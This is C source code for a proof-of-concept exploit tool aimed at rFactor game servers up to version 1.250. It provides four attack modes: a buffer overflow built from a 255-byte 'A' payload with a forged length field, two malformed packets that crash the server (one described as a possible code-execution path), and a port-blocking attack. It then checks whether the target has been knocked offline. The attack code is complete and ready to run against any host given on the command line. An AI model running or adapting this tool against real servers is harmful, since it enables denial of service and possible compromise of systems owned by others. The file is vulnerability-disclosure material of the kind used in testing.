/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif



#define VER         "0.1"
#define TPORT       34447
#define IPORT       34297
#define UPORT       34397

typedef uint8_t     u8;
typedef int8_t      i8;
typedef uint16_t    u16;
typedef int16_t     i16;
typedef uint32_t    u32;
typedef int32_t     i32;



int sd_check(struct sockaddr_in *peer, int proto, int type, u8 *buff, int len);
int rfactor_info(struct sockaddr_in *peer);
int rfactor_send(int sd, int type, u8 *data, int len);
int rfactor_recv(int sd, int *type, u8 *buff);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     err,
            len,
            type,
            attack,
            proto;
    u16     port;
    u8      buff[0xff];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "rFactor <= 1.250 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <attack> <protocol> <host> [port]\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow\n"
            " 2 = \"Connection lost\" crash\n"
            " 3 = crash/possible code execution\n"
            " 4 = port 34397 blocked\n"
            "\n"
            "Protocols:\n"
            " t = TCP (default port %hu)\n"
            " u = UDP (default port %hu)\n"
            "\n", argv[0], TPORT, UPORT);
        exit(1);
    }

    attack = atoi(argv[1]);
    proto  = tolower(argv[2][0]);
    if(proto == 't') {
        port = TPORT;
    } else if(proto == 'u') {
        port = UPORT;
    } else {
        printf("\nError: wrong protocol (%s)\n", argv[2]);
        exit(1);
    }

    if(argc > 4) port = atoi(argv[4]);
    peer.sin_addr.s_addr = resolv(argv[3]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    rfactor_info(&peer);

    printf("- start attack %d\n", attack);

    if(attack == 1) {
        type = 0x80;
        memset(buff,    'A',  255);
        putxx(buff + 6, 0xff, 8);
        len  = 255;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

        printf("\n- now we query the server for exploiting the bug\n");
        rfactor_info(&peer);

    } else if(attack == 2) {
        type = 0x30;
        len  = 0;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

    } else if(attack == 3) {
        type = 0x60;
        memset(buff, 'A',    255);
        putxx(buff,  0x1ffb, 16);   // value & 0x1ffb (circa)
        len  = 255;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

    } else if(attack == 4) {
        type = 0x20;
        len  = 0;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

    } else {
        printf("\nError: unexistent attack number\n");
        exit(1);
    }

    printf("\n- wait some seconds\n");
    sleep(ONESEC * 3);

    printf("- now I check if the server is still online:\n");
    if(attack == 4) {
        err = rfactor_info(&peer);
    } else {
        type   = 0x40;
        memset(buff, 0, 16);
        len    = 16;
        err = sd_check(&peer, proto, type, buff, len);
    }

    if(err < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server is not vulnerable\n");
    }

    return(0);
}



int sd_check(struct sockaddr_in *peer, int proto, int type, u8 *buff, int len) {
    int     sd;

    if(proto == 't') {
        printf("- use TCP protocol\n");
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    } else {
        printf("- use UDP protocol\n");
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    }
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) return(-1);

    if(rfactor_send(sd, type, buff, len) < 0) return(-1);
    if(timeout(sd, 3) > 0) {
        len = rfactor_recv(sd, &type, buff);
    }

    close(sd);
    return(0);
}



void fgetz(u8 *buff, int size) {
    u8      *p;

    fgets(buff, size, stdin);
    for(p = buff; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int rfactor_info(struct sockaddr_in *peer) {
    u32     ver;
    int     sd,
            len,
            new_port;
    u16     port_bck;
    u8      buff[4096],
            *p;

    new_port = -1;
    port_bck = peer->sin_port;
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- query server for info:\n");

    peer->sin_port = htons(IPORT);
    len = sprintf(buff, "rF_S") + 1;
    len = send_recv(sd, buff, len, buff, sizeof(buff), peer, 0);
    if(len > 0) {
        getxx(buff + 17, &ver, 16);
        printf("\n"
            "  version         %hu\n"
            "  game database   %s\n"
            "  server name     %s\n"
            "  current event   %s\n"
            "  MOTD            %s\n"
            "\n",
            ver,
            buff + 25,
            buff + 45,
            buff + 73,
            buff + 105);
    }

    printf("- query server for TCP port\n");

    peer->sin_port = htons(UPORT);
    len = sprintf(buff, "<<HPWsock>> TCPReqnrFactor %u.%u",
        ver / 1000, ver % 1000);
    len = send_recv(sd, buff, len, buff, sizeof(buff), peer, 0);
    if(len > 0) {
        printf("  %.*s\n", len, buff);
        p = stristr(buff, "TCPInfo ");
        if(p) new_port = atoi(p + 8);
    }

    close(sd);
    peer->sin_port = port_bck;
    return(new_port);
}



int rfactor_send(int sd, int type, u8 *data, int len) {
    u8      buff[1 + 1 + 0xff];

    buff[0] = len;
    buff[1] = type;
    memcpy(buff + 2, data, len);
    fputc('.', stdout);
    return(send(sd, buff, 2 + len, 0));
}



int rfactor_recv(int sd, int *type, u8 *buff) {
    int     t;
    u16     rem,
            len;
    u8      tb[2],
            *p;

    if(recv(sd, tb,     1, 0) < 0) return(-1);
    if(recv(sd, tb + 1, 1, 0) < 0) return(-1);

    len   = tb[0];
    *type = tb[1];

    rem = len;
    p   = buff;
    while(rem) {
        t = recv(sd, p, rem, 0);
        if(t <= 0) return(-1);
        p += t;
        rem -= t;
        fputc('.', stdout);
    }

    return(len);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


